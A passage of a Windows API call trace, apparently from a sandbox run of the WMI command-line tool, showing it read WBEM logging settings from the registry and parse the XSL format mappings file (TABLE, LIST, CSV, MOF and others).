	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="NONE") returned 0x4
	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0049.653] SysStringLen (param_1="DEFAULT") returned 0x7
	[0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0049.653] SysStringLen (param_1="PKT") returned 0x3
	[0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="PKTINTEGRITY") returned 0xc
	[0049.653] SysStringLen (param_1="PKTPRIVACY") returned 0xa
	[0049.654] GetSystemDirectoryW (in: lpBuffer=0x233e14f7cd0, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0049.654] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13
	[0049.654] SysStringLen (param_1="\\wbem\\") returned 0x6
	[0049.654] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32
	[0049.654] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19
	[0049.654] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10
	[0049.654] GetCurrentThreadId () returned 0xdf0
	[0049.654] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x350027efc0 | out: phkResult=0x350027efc0*=0x144) returned 0x0
	[0049.654] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x350027f010, lpcbData=0x350027efb0*=0x400 | out: lpType=0x0, lpData=0x350027f010*=0x30, lpcbData=0x350027efb0*=0x4) returned 0x0
	[0049.654] _wcsicmp (_String1="0", _String2="1") returned -1
	[0049.654] _wcsicmp (_String1="0", _String2="2") returned -2
	[0049.654] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x350027efb0*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x350027efb0*=0x42) returned 0x0
	[0049.655] RegQueryValueExW (in: hKey=0x144, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x233e14f80e0, lpcbData=0x350027efb0*=0x42 | out: lpType=0x0, lpData=0x233e14f80e0*=0x25, lpcbData=0x350027efb0*=0x42) returned 0x0
	[0049.655] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0049.655] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32
	[0049.655] RegQueryValueExW (in: hKey=0x144, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x350027f010, lpcbData=0x350027efb0*=0x400 | out: lpType=0x0, lpData=0x350027f010*=0x36, lpcbData=0x350027efb0*=0xc) returned 0x0
	[0049.655] _wtol (_String="65536") returned 65536
	[0049.655] RegCloseKey (hKey=0x0) returned 0x6
	[0049.655] CoCreateInstance (in: rclsid=0x7ff66e6c35c8*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff66e6c35d8*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x350027f4b8 | out: ppv=0x350027f4b8*=0x233e1a26f20) returned 0x0
	[0049.892] FreeThreadedDOMDocument:IXMLDOMDocument:load (in: This=0x233e1a26f20, xmlSource=0x350027f5f0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x350027f670 | out: isSuccessful=0x350027f670*=0xffff) returned 0x0
	[0050.167] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x233e1a26f20, DOMElement=0x350027f4c0 | out: DOMElement=0x350027f4c0*=0x233e1a294a0) returned 0x0
	[0050.168] IXMLDOMElement:getElementsByTagName (in: This=0x233e1a294a0, tagName="XSLFORMAT", resultList=0x350027f4b0 | out: resultList=0x350027f4b0*=0x233e1a2ca30) returned 0x0
	[0050.169] IXMLDOMNodeList:get_length (in: This=0x233e1a2ca30, listLength=0x350027f680 | out: listLength=0x350027f680*=21) returned 0x0
	[0050.169] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=0, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.169] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.170] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.170] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="TABLE", varVal2=0x0)) returned 0x0
	[0050.170] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.170] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.170] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.170] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=1, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.170] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0
	[0050.170] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.170] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.171] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="VALUE", varVal2=0x0)) returned 0x0
	[0050.171] SysStringLen (param_1="VALUE") returned 0x5
	[0050.171] SysStringLen (param_1="TABLE") returned 0x5
	[0050.171] SysStringLen (param_1="TABLE") returned 0x5
	[0050.171] SysStringLen (param_1="VALUE") returned 0x5
	[0050.171] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.171] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.171] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.171] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=2, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.171] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="textvaluelist.xsl") returned 0x0
	[0050.171] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.171] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.171] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="LIST", varVal2=0x0)) returned 0x0
	[0050.171] SysStringLen (param_1="LIST") returned 0x4
	[0050.171] SysStringLen (param_1="TABLE") returned 0x5
	[0050.171] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.171] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.171] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.171] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=3, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.172] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="rawxml.xsl") returned 0x0
	[0050.172] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.172] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="RAWXML", varVal2=0x0)) returned 0x0
	[0050.172] SysStringLen (param_1="RAWXML") returned 0x6
	[0050.172] SysStringLen (param_1="TABLE") returned 0x5
	[0050.172] SysStringLen (param_1="RAWXML") returned 0x6
	[0050.172] SysStringLen (param_1="LIST") returned 0x4
	[0050.172] SysStringLen (param_1="LIST") returned 0x4
	[0050.172] SysStringLen (param_1="RAWXML") returned 0x6
	[0050.172] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.172] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.172] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.172] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=4, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.172] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0
	[0050.172] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.172] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.172] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HTABLE", varVal2=0x0)) returned 0x0
	[0050.172] SysStringLen (param_1="HTABLE") returned 0x6
	[0050.172] SysStringLen (param_1="TABLE") returned 0x5
	[0050.173] SysStringLen (param_1="HTABLE") returned 0x6
	[0050.173] SysStringLen (param_1="LIST") returned 0x4
	[0050.173] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.173] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.173] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.173] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=5, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.173] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="hform.xsl") returned 0x0
	[0050.173] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.173] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="HFORM", varVal2=0x0)) returned 0x0
	[0050.173] SysStringLen (param_1="HFORM") returned 0x5
	[0050.173] SysStringLen (param_1="TABLE") returned 0x5
	[0050.173] SysStringLen (param_1="HFORM") returned 0x5
	[0050.173] SysStringLen (param_1="LIST") returned 0x4
	[0050.173] SysStringLen (param_1="HFORM") returned 0x5
	[0050.173] SysStringLen (param_1="HTABLE") returned 0x6
	[0050.173] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.173] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.173] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.173] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=6, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.173] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="xml.xsl") returned 0x0
	[0050.173] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.173] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.174] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="XML", varVal2=0x0)) returned 0x0
	[0050.174] SysStringLen (param_1="XML") returned 0x3
	[0050.174] SysStringLen (param_1="TABLE") returned 0x5
	[0050.174] SysStringLen (param_1="XML") returned 0x3
	[0050.174] SysStringLen (param_1="VALUE") returned 0x5
	[0050.174] SysStringLen (param_1="VALUE") returned 0x5
	[0050.174] SysStringLen (param_1="XML") returned 0x3
	[0050.174] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.174] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.174] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.174] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=7, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.174] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="mof.xsl") returned 0x0
	[0050.174] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.174] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.174] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MOF", varVal2=0x0)) returned 0x0
	[0050.174] SysStringLen (param_1="MOF") returned 0x3
	[0050.174] SysStringLen (param_1="TABLE") returned 0x5
	[0050.174] SysStringLen (param_1="MOF") returned 0x3
	[0050.174] SysStringLen (param_1="LIST") returned 0x4
	[0050.174] SysStringLen (param_1="MOF") returned 0x3
	[0050.174] SysStringLen (param_1="RAWXML") returned 0x6
	[0050.174] SysStringLen (param_1="LIST") returned 0x4
	[0050.174] SysStringLen (param_1="MOF") returned 0x3
	[0050.175] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.175] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.175] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.175] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=8, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.175] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="csv.xsl") returned 0x0
	[0050.175] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.175] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.175] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="CSV", varVal2=0x0)) returned 0x0
	[0050.175] SysStringLen (param_1="CSV") returned 0x3
	[0050.175] SysStringLen (param_1="TABLE") returned 0x5
	[0050.175] SysStringLen (param_1="CSV") returned 0x3
	[0050.175] SysStringLen (param_1="LIST") returned 0x4
	[0050.175] SysStringLen (param_1="CSV") returned 0x3
	[0050.175] SysStringLen (param_1="HTABLE") returned 0x6
	[0050.175] SysStringLen (param_1="CSV") returned 0x3
	[0050.175] SysStringLen (param_1="HFORM") returned 0x5
	[0050.175] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.175] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.176] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.176] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=9, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.176] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.176] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.176] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys.xsl", varVal2=0x0)) returned 0x0
	[0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.176] SysStringLen (param_1="TABLE") returned 0x5
	[0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.176] SysStringLen (param_1="VALUE") returned 0x5
	[0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.176] SysStringLen (param_1="XML") returned 0x3
	[0050.176] SysStringLen (param_1="XML") returned 0x3
	[0050.176] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.176] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.176] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.176] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.176] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=10, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.176] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.176] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.176] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.177] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="texttablewsys", varVal2=0x0)) returned 0x0
	[0050.177] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.177] SysStringLen (param_1="TABLE") returned 0x5
	[0050.177] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.177] SysStringLen (param_1="XML") returned 0x3
	[0050.177] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.177] SysStringLen (param_1="XML") returned 0x3
	[0050.177] SysStringLen (param_1="texttablewsys") returned 0xd
	[0050.177] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.177] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.177] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.177] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=11, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.177] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.177] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.177] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.177] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat.xsl", varVal2=0x0)) returned 0x0
	[0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.177] SysStringLen (param_1="TABLE") returned 0x5
	[0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.177] SysStringLen (param_1="XML") returned 0x3
	[0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.177] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.177] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.178] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.178] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.178] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.178] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=12, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.178] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.178] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.178] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.178] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformat", varVal2=0x0)) returned 0x0
	[0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.178] SysStringLen (param_1="TABLE") returned 0x5
	[0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.178] SysStringLen (param_1="XML") returned 0x3
	[0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.178] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.178] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.178] SysStringLen (param_1="wmiclitableformat") returned 0x11
	[0050.178] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.178] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.178] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.178] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=13, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.179] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.179] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.179] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys.xsl", varVal2=0x0)) returned 0x0
	[0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.179] SysStringLen (param_1="TABLE") returned 0x5
	[0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.179] SysStringLen (param_1="XML") returned 0x3
	[0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.179] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.179] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.179] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.179] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.179] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.179] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.179] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=14, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.179] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="texttable.xsl") returned 0x0
	[0050.179] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.179] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
	[0050.180] IXMLDOMNode:get_nodeValue (in: This=0x233e1a2d0e0, value=0x350027f4f8 | out: value=0x350027f4f8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="wmiclitableformatnosys", varVal2=0x0)) returned 0x0
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] SysStringLen (param_1="TABLE") returned 0x5
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] SysStringLen (param_1="XML") returned 0x3
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] SysStringLen (param_1="texttablewsys.xsl") returned 0x11
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a
	[0050.180] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15
	[0050.180] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16
	[0050.180] IUnknown:Release (This=0x233e1a2d070) returned 0x0
	[0050.180] IUnknown:Release (This=0x233e1a296d0) returned 0x0
	[0050.180] IUnknown:Release (This=0x233e1a2d0e0) returned 0x0
	[0050.180] IXMLDOMNodeList:get_item (in: This=0x233e1a2ca30, index=15, listItem=0x350027f490 | out: listItem=0x350027f490*=0x233e1a2d070) returned 0x0
	[0050.180] IXMLDOMNode:get_text (in: This=0x233e1a2d070, text=0x350027f498 | out: text=0x350027f498*="htable.xsl") returned 0x0
	[0050.180] IXMLDOMNode:get_attributes (in: This=0x233e1a2d070, attributeMap=0x350027f4a0 | out: attributeMap=0x350027f4a0*=0x233e1a296d0) returned 0x0
	[0050.180] IXMLDOMNamedNodeMap:getNamedItem (in: This=0x233e1a296d0, name="KEYWORD", namedItem=0x350027f4a8 | out: namedItem=0x350027f4a8*=0x233e1a2d0e0) returned 0x0
